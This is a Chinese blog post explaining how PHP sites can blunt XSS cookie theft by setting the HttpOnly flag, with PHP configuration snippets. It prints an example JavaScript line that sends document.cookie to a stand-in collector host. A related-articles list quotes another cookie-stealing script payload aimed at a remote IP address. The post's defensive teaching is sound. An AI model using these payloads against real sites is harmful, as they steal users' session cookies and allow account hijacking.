xss防御之php利用httponly防xss攻击

最新推荐文章于 2022-03-28 16:49:25 发布
最新推荐文章于 2022-03-28 16:49:25 发布
阅读量627 收藏
点赞数
分类专栏: php面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangdaohong/article/details/82778299
版权

https://www.jb51.net/article/48345.htm

xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。

如下js获取cookie信息:

 

复制代码 代码如下:


url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;

 

一般cookie都是从document对象中获取的,现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数,跟domain等其他参数一样,一旦这个HttpOnly被设置,你在浏览器的document对象中就看不到Cookie了。

PHP设置HttpOnly

 

复制代码 代码如下:


//在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);

//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

 

对于PHP5.1以前版本的PHP通过:

 

复制代码 代码如下:


header("Set-Cookie: hidden=value; httpOnly");

 

最后,HttpOnly不是万能的!

zhangdaohong
关注
专栏目录
xss攻击之伪造cookie
Pythonicc的博客
01-23 10万+
xss攻击之伪造cookie靶场地址:XSS盲打利用XSS公开平台生成漏洞利用代码UML 图表 靶场地址: http://59.63.200.79:8004/Feedback.asp XSS盲打 见框就插,输入进行测试 (若有长度限制则在input框中修改最大长度),点击【提交留言】按钮: 随后自动跳转到查看留言界面: 很明显插入的js代码可直接执行,分别执行了这三段代码 尝试刷新后仍然可执...
XSS (跨站脚本攻击) 分析与实战
未完成的歌~的博客
01-14 6062
文章目录一、漏洞原理1、XSS简介:2、XSS原理解析:3、XSS的分类:3.1、反射型XSS3.2、存储型XSS3.3、DOM型XSS二、靶场实战XSS实现盗取管理员Cookie并登录: 一、漏洞原理 1、XSS简介: XSS全称:Cross Site Scripting,即跨站脚本攻击,为了不和“层叠样式表”(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是最常见的 Web 应用程序安全漏洞之一,这类漏洞能够使攻击者嵌入恶意脚本代码(一般是JS
web安全学习笔记(八) XSScookie劫持
qycc3391的博客
03-06 1627
上一文中提到XSS的分类,本文将演示如何通过XSS进行cookie劫持,并且伪装登录。 再cookie劫持中,有三种身份,分别是服务器,普通用户以及攻击者。这里使用本机和两台台虚拟机完成这项工作。基本思路如图所示: 首先,攻击者发现某个网站存在XSS漏洞,于是编写恶意代码。当用户访问带有恶意代码的网站时,会将通过恶意代码,将cookie发送给攻击者。当攻击者获取cookie后,便可以使用cook...
说说劫持 Cookie 的原理
weixin_34329187的博客
04-06 615
完成具体功能的恶意脚本(javaScript、Flash 等)称为 XSS Payload。黑客会通过这些脚本,来控制用户的浏览器。劫持 Cookie 就是一种 XSS Payload。 Cookie 中,一般加密存放着当前用户的登陆凭证。如果 Cookie劫持,那么黑客就可以不使用密码,直接登陆到用户的账号中。 1 窃取 Cookie 首先先在存在 XSS 漏洞的网站,加载一段远程脚本,形...
Javascript Hook 钩子 定位cookie、window生成调用
qq_41236493的博客
06-08 7056
下载Chrome插件 下载谷歌插件:Tampermonkey油猴插件 使用方法 1、点击油猴,打开控制面板 2、点击加号,添加脚本 3、添加脚本内容,下面有代码。 4、打开需要调试页面,按F12,刷新即可。 打开油猴管理面板.png 点击加号,添加脚本.png 脚本.png 获取window对象 // ==UserScript== // @name ...
8、XSS 攻击的防御pdf资料
10-15
XSS(跨站脚本攻击)是网络安全领域中一种常见的攻击方式,主要利用JavaScript来实施恶意行为。这种攻击之所以称为XSS,是因为原本的缩写CSS与层叠样式表(Cascading Style Sheets)冲突,因此改用XSSXSS攻击的...
XSS攻击实现
05-09
XSS(Cross Site Scripting)攻击是网络安全领域中常见的攻击方式之一,攻击者通过注入恶意脚本,使得用户在访问网站时执行这些脚本,从而窃取用户信息或破坏网站功能。XSS攻击是保障Web应用安全的重要环节。...
XSS漏洞攻击与护源代码
最新发布
10-31
4. 使用HTTPOnly Cookie:设置CookieHTTPOnly属性可以止JavaScript访问Cookie,减少通过XSS攻击窃取Session Cookie的可能性。 5. 避免使用eval()和内联事件处理程序:eval()函数可以直接执行字符串作为...
XSS的高级利用:盗取用户Cookie
Zeker62的博客
08-13 1182
XSS不仅仅弹出一个alert就行了,更多的是和其他玩意组合 高级的利用有: 盗取用户Cookie 修改网页内容 网站挂马 利用网站重定向 XSS蠕虫 XSS会话劫持 XSS会话劫持Cookie有关 Cookie简介: Cookie是一种能够让网站服务器把少量文本数据存储到客户端的硬盘或者内存中,或者是从客户端的硬盘或者内存读取数据的一种技术 因为HTTP协议是无状态的,Web服务器没办法区分请求是否来源于同一个浏览器,因此,web服务器需要额外的数据去维持会话,而Cookie正是这种维持会话的数
XSS利用姿势-会话劫持-->不只是弹cookie
风雨来花满楼的博客
09-28 1030
描述(这里直接使用项目作者原话): SuperXSS项目地址: https://github.com/kagurazakasanae/SuperXSS 引言:当X别人站的时候,遇到Httponly flag时,被x到的站位于内网无法直接访问时,你要做的是:使用SuperXSSS SuperXSS是一个基于Websocket的客户端网页代理程序,客户端JS被注入之后会创建到指定服务端的Websocket连接并接收命令进行XHR请求,从而使得无法直接访问的后台等可以通过客户端浏览器本身作为代理访问。 程序
Cookie窃取攻击
热门推荐
熊俊坤的博客
11-11 1万+
Cookie窃取攻击XSS跨站攻击就是攻击者通过一些正常的站内交互途径(发布文章、添加文章、发送邮件、留言),提交含有恶意javascript脚本代码的文本内容。如果服务器端没有过滤这些恶意脚本,反而将其作为网站内容发布到Web页面上。当其他用户访问该页面的时候,这些恶意脚本就会被执行,用户就会被收到攻击。
xsscookie窃取原理
鸣蜩十四的博客
08-09 1435
原理:我们可以在有xss漏洞的网站插入跳入我们网站的xss代码,使用户触发漏洞的时候将cookie传入进来,我们进行接收 具体实现: 攻击代码:<script>document.write('<img src="http://1.117.107.31/getcookie.php?cookie='+document.cookie+'" width=0 height=0 border=0 />');</script> 远程接收代码: <?php $c...
Pikachu (xss跨站脚本攻击)
weixin_54431413的博客
03-28 4858
xss概念 跨站脚本攻击(Cross Site Scripting)缩写为CSS 但与样式css容易混淆,所以简记为xss,分为三个类型,非持续性(反射型),持续型(存储型),dom型。 其中 持续型 危害最大。 一、反射型(xss get) 1.右击检查,页面源代码,可以看到form表单提交的数据显示在下面 2.用<script>alert(1)</script>弹窗测试 出现弹窗显示 数字1 3.也可以构造出查看cookiejs语句 messa.
JS 操作Cookie
生活要快乐 - 魏言
08-31 518
/*名称:Cookie函数版本:1.0.1 (Beta)作者:洪磊E-mail:[email]honglei@live.com[/email]*/var HL = HL || {};HL.Cookie = {/*函数名称:HL.Cookie.Get([string name])函数功能:得到Cookie参数:name 可选项,要取得的Cookie名称
JS-封装跨网页获取cookiejs代码
weixin_30297281的博客
09-11 408
/* * 功能:设置cookie * 参数: * _name cookie名称 * _value 该cookie名称所对应的数据 * _date 该cookie的过期时间,单位天 * 返回值:无 * 示例: * setCookie("a", "10", 1); 创建或修改一个cookie,名称叫做a,值为"10",过期时间为1天后 * setCookie("a", "10"); 创建或...
xss payload
weixin_33813128的博客
01-22 138
xss payload可以使用富客户端文本书写,大多数用javascript,少部分用actionscript等等。 1.盗取cookie,发起cookie劫持 使用xss漏洞插入cookie.js cookie.js代码:   1 var img = document.createElement("img"); 2   ...
xss漏洞-DVWA跨站攻击盗取用户cookie
CKT_GOD的博客
09-18 3598
程Kaedy.cn-www.kaedy.cn XSS跨站脚本攻击介绍 跨站脚本攻击英文全称为(Cross site Script)缩写为 CSS,但是为了和层叠样式表(Cascading Style Sheet)CSS 区分开来,所以在安全领域跨站脚本攻击叫做 XSS XSS 攻击简介 XSS 攻击通常指黑客通过往 Web 页面中插入恶意 Script 代码,当用户访问网页时恶意代码在用户的 浏览器中被执行,从而劫持用户浏览器窃取用户信息。 1、黑客加在特定 web 页面 index.html 中,加入
后台XSS注入,禁止JS获取COOKIE
bravezhe的专栏
01-02 7442
1.PHP 5.2以下支持 header("Set-Cookie: hidden=value; httpOnly"); 2.PHP5.2以上支持 ini_set("session.cookie_httponly", 1); 3.兼容全部PHP版本 setcookie("name","hello", NULL, NULL, NULL, NULL, TRUE);
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值